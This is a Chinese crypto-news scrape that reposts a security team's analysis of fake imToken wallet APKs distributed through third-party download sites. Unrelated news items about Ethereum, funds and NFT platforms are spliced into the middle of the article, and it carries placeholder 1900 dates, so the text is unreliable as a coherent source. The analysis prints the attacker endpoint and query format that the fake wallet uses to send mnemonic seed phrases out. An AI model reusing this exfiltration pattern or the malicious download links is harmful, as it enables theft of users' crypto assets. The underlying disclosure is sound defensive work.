買比特幣 買比特幣
Ctrl+D 買比特幣
ads
首頁 > 狗狗幣 > Info

COM:Web3 假錢包第三方源調查分析:如何甄別網絡釣魚攻擊?_Comodo Coin

Author:

Time:1900/1/1 0:00:00

慢霧安全團隊建議使用錢包、交易所時請認準官方下載渠道并從多方進行驗證。

原文:https://foresightnews.pro/article/h5Detail/31716

作者:山&耀

轉自:ForesightNews

背景

基于區塊鏈技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包「登錄」;這與我們傳統意義上的「登錄」不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行「登錄」,我們可以看到「登錄」錢包時顯示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而錢包是你在Web3世界中的唯一通行證。

North Rock Digital創始人:以太坊在Web3中的主導地位植根于多年實驗和開發:5月6日消息,North Rock Digital創始人Hal Press確信,以太坊目前在Web3中的杰出地位深深植根于多年的實驗和開發。

Press發推稱,以太坊成為該領域所有頂級鏈上玩家的“毋庸置疑的舞臺”,這要歸功于開發者多年來的辛勤工作,而不應歸因于短期投機催化劑。

Press高度贊揚了以太坊的開發者,他還強調了上海升級成功對ETH主導地位的作用。(U.Today)[2023/5/7 14:47:41]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

Landmark Ventures推出無代碼Web3開發平臺Better Blocks:金色財經報道,Landmark Ventures是一家戰略咨詢公司,提供業務開發、定制活動和全球投資銀行服務的獨特組合,今天宣布推出Better Blocks,這是一個新的Web3平臺,提供B2B創新產品和工具套件,可擴展和加速組織的區塊鏈和NFT項目。[2023/4/5 13:44:57]

網站分析

鑒于下載途徑眾多,我們今天以apkcombo為例看看,apkcombo是一個第三方應用市場,它提供的應用據官方說大部分來源于其他正規應用商店,但事實是否真如官方所說呢?

我們先看下apkcombo的流量有多大:

據數據統計站點similarweb統計,apkcombo站點:

M31 Capital推出1億美元Web3基金“Web3 Opportunity Fund”:10月4日消息,據M31 Capital Management,LLC官方網站顯示,這家專注于加密資產和區塊鏈技術的投資公司已經推出了一支Web3新基金“Web3 Opportunity Fund”,該基金的募資上限為1億美元,目前已經從一些頭部投資方那里獲得了5000萬美元的投資承諾,未來將重點投資去中心化基礎設施,流動性Token等加密項目。

除了這支Web3新基金之外,M31 Capital此前還推出了多個加密基金產品,包括比特幣基金、DeFi 基金和風險投資(VC)基金,并開創了“流動性風險基金”的概念。[2022/10/5 18:39:31]

全球排名:1,809國家排名:7,370品類排名:168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

LG選擇Web3基礎設施平臺Fr0ntierX作為其全球合作伙伴以提供NFT集成和體驗服務:金色財經報道,LG Electronics Business Solutions (LG) 已宣布和 NFT 平臺Fr0ntier X 建立全球合作伙伴關系,以在 LG webOS 智能服務上提供交互式 NFT 集成和體驗。Fr0ntier X 支持通過電子觸控屏對 NFT 進行安全認證和身份驗證,使品牌和用戶能夠在最大化 NFT 效用的同時探索新其他可能性,比如無縫瀏覽、購買、顯示 NFT 并與之交互。(blockster)[2022/10/5 18:39:28]

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:https://play.google.com/store/apps/details?id=im.token.app

Encointer正研究基于加密貨幣的基本收入分配方案,已獲得Web3基金會資金支持:總部位于瑞士蘇黎世的初創公司Encointer正在研究一種基于加密貨幣的基本收入分配方案,其測試網的發布已獲得了Web3基金會的資金支持,Web3基金會資助負責人David Hawig表示:“Web3基金會非常有興趣支持探索新的數字金融系統的項目,這些系統可能更公平,也能完全保護隱私。”(Decrypt)[2020/5/1]

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為:https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

錢包分析

在之前我們已經分析過不少假錢包的案例,如:2021-11-24我們披露:《慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖,最早的「api.funnel.rocks」證書出現在2022-06-03,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

總結

目前這種騙局活動不僅活躍,甚至有擴大范圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

imToken錢包:https://token.im/TokenPocket錢包:https://www.tokenpocket.pro/TronLink錢包:https://www.tronlink.org/比特派錢包:https://bitpie.com/MetaMask錢包:https://metamask.io/TrustWallet:https://trustwallet.com/請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

?

Tags:WEBWEB3COMKENweb3游戲平臺WEB3ALLBI幣Comodo CoinJail Kwon Token

狗狗幣
IDO:IDO&IEO:盤點即將上線的6個熱門項目_Bulldog Token

本周,Odaily星球日報甄選了近期即將在多個平臺首發的6個項目名單,并分別做簡要介紹,其中包括Binance即將進行IEO項目OpenCampus.

1900/1/1 0:00:00
LTC:LTC減半不足百天,價格是否會上漲?_LTC幣

感謝閱讀!進裙關注公中呺:全因素熱愛 一、今天周二,先說三點 1.說一下行情。昨日大盤小幅拉升一波,但很快又被壓下去,說明多空雙方比較焦灼.

1900/1/1 0:00:00
BAS:教程:如何為潛在BASE空投做準備?_coinbase交易所app下載

來自Twitter,原文作者:加密行業投資人AxelBitblazeOdaily星球日報訊|Moni4月25日.

1900/1/1 0:00:00
COIN:Hotcoin關於暫停FAX充提業務的公告_coinpinpin

尊敬的用戶:由於FAX節點升級,Hotcoin現已暫停FAX充值、提現業務,交易不受影響,具體開放時間敬請留意官方公告.

1900/1/1 0:00:00
IFT:比特幣“減半”可以使比特幣價格超過 50000 美元_Gift Coin

對于加密貨幣投資者來說,每四年一個周期就有一年崩盤,而我們似乎在2022年經歷了這一年。至少就目前而言,在最壞的情況下,比特幣有望在當前范圍內完成這一年。然而,減半期代表了比特幣和山寨幣的看漲.

1900/1/1 0:00:00
TUSD:在Binance的支持下,TUSD市值在4個月內飆升120%_USD

TrueUSD(TUSD)是最近推出的穩定幣,市值飆升,自2023年1月起僅四個月就上漲了120%。這一增長可歸功于幣安的支持,使其成為僅次于USDT的第五大穩定幣,以及美國中央銀行.

1900/1/1 0:00:00
ads